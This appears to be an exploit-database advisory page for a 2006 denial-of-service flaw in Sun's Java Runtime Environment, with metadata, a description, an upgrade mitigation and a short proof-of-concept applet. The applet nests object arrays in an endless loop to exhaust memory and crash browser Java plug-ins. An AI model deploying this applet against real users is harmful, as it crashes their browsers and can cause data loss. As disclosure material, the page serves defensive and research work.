header-logo
Suggest Exploit
vendor:
Java Runtime Environment
by:
Marc Schoenefeld
7.5
CVSS
HIGH
Denial of Service
400
CWE
Product Name: Java Runtime Environment
Affected Version From: 1.4.2_11
Affected Version To: 1.5.0_06
Patch Exists: YES
Related CWE: N/A
CPE: a:sun:java_runtime_environment
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Sun Java Runtime Environment Denial of Service Vulnerability

The Sun Java Runtime Environment is vulnerable to a denial-of-service vulnerability. This issue is due to the software's failure to handle exceptional conditions. An attacker may exploit this issue to cause a vulnerable application -- as well as all processes spawned from the application -- to crash, denying service to legitimate users. Due to the scope of the crash, data loss may occur.

Mitigation:

Upgrade to the latest version of the Sun Java Runtime Environment.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/18058/info

The Sun Java Runtime Environment is vulnerable to a denial-of-service vulnerability. This issue is due to the software's failure to handle exceptional conditions. 

This issue is reported to affect Java Runtime Environment versions up to 1.4.2_11 and 1.5.0_06. This issue will crash Internet browsers running an affected Java plug-in. 

An attacker may exploit this issue to cause a vulnerable application -- as well as all processes spawned from the application -- to crash, denying service to legitimate users. Due to the scope of the crash, data loss may occur.

public class MemApplet extends java.applet.Applet{ 
/* (c) Marc Schoenefeld */ 
static Object o = null; 
public static void main(String[] args) { 
(new MemApplet()).doit(); 
} 
public void paint(java.awt.Graphics p) { 
(new MemApplet()).doit(); } 
void doit () { 
while (true) try { Object[] oarr = {o}; o = oarr; } catch (Throwable t) { o = null; System.out.println("Wurfgeschoss: " + t); } } }

Navigation

Suggest Exploit

Services By CQR